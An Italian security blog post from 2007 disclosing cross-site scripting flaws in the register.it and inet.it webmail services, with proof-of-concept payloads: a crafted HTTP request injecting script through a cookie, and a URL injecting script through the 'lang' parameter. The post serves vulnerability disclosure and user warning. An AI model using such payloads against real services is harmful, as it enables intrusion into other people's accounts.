cyphersec A blog about Web Application Security and .NET development best practices

Advisory: webmail.register.it / webmail.inet.it [XSS]

Dopo Aruba S.p.A è il turno di Register.it e Inet.it altri due "giganti" del settore Hosting Italiano. Anche questa volta sotto la lente d'ingrandimento sono finite due degli applicativi maggiormente utilizzati per la gestione della posta elettronica via web.

Come molti avranno notato, i test sono principalmente indirizzati alla rilevazione di falle di tipo Cross Site Scripting. La mia preoccupazione più grande, che mi sento in dovere di denunciare, è la totale assenza dell'adozione di canali di codifica per il transito delle credenziali. Sinceramente mi stupisco di come sia possibile il non utilizzo di canali https per applicazioni "sensibili" come le webmail. Purtroppo, questa grave dimenticanza rende possibile lo spoofing delle credenziali di accesso degli utenti sotto controllo da maleintenzionati (si, parlo a te che sniffi la rete wifi del tuo vicino).

Tornando al nostro post; ecco gli ormai "familiari" advisory:

webmail.register.it
Alessio Marziali
www.cyphersec.com
30/05/2007
alessio.marziali@cyphersec.com
Tipologia Vulnerabilità : Cross Site Scripting
Componente Vulnerabile : Cookie
Proof of Concept: Visualizzazione alert JavaScript "XSS" (rimuovere gli spazi)
GET http://webmail.register.it:80/login.html HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: webmail.register.it
Cookie: cookie%5Bdomain%5D=deleted;cookie%5Buserid%5D=>">< script%20%0a%0d>alert('XSS')%3B< /script>;PHPSESSID=1ca9f22c7e32522815ede79b29ca9fe9;__utma=177195445%2E1258436166%2E1180555463%2E1180555463%2E1180555463%2E1;%20path=%2F;%20expires=Sun%2C%2018%20Jan%202038%2000%3A00%3A00%20GMT;%20domain=acunetix%2Ecom;=111-222-1933email@address.com;__utmb=177195445;__utmc=177195445;__utmz=177195445%2E1180555462%2E1%2E1%2Eutmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29;%20%20expires=Thu%2C%2029%20Nov%202007%2008%3A04%3A22%20UTC;GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Connection: Close
Pragma: no-cache

webmail.inet.it
Alessio Marziali
www.cyphersec.com
30/05/2007
alessio.marziali@cyphersec.com
Tipologia Vulnerabilità : Cross Site Scripting
Componente Vulnerabile : index.cgi
Proof of Concept: Visualizzazione alert JavaScript "XSS" (rimuovere gli spazi)
http://webmail.inet.it:80/?lang=< script%20%0a%0d>alert('XSS')%3B< / script>

L'invito è sempre il solito.
1)Evitare l'uso di questi servizi mail per la trasmissione di comunicazioni sicure.
2)Se il punto 1 non è attuabile, utilizzare FireFox ed abilitare NoScript per i servizi indicati.

A volte bisogna imparare dai grandi per riuscire a fare prodotti sicuri.

About Alessio Marziali

Alessio Marziali (MCTS) is a Security Consultant with 9 years of experience developing secure applications with Microsoft .NET in a variety of sectors in UK and Italy. Published technical author with two ASP.NET books currently available for purchase and OWASP Code Crawler Project Leader.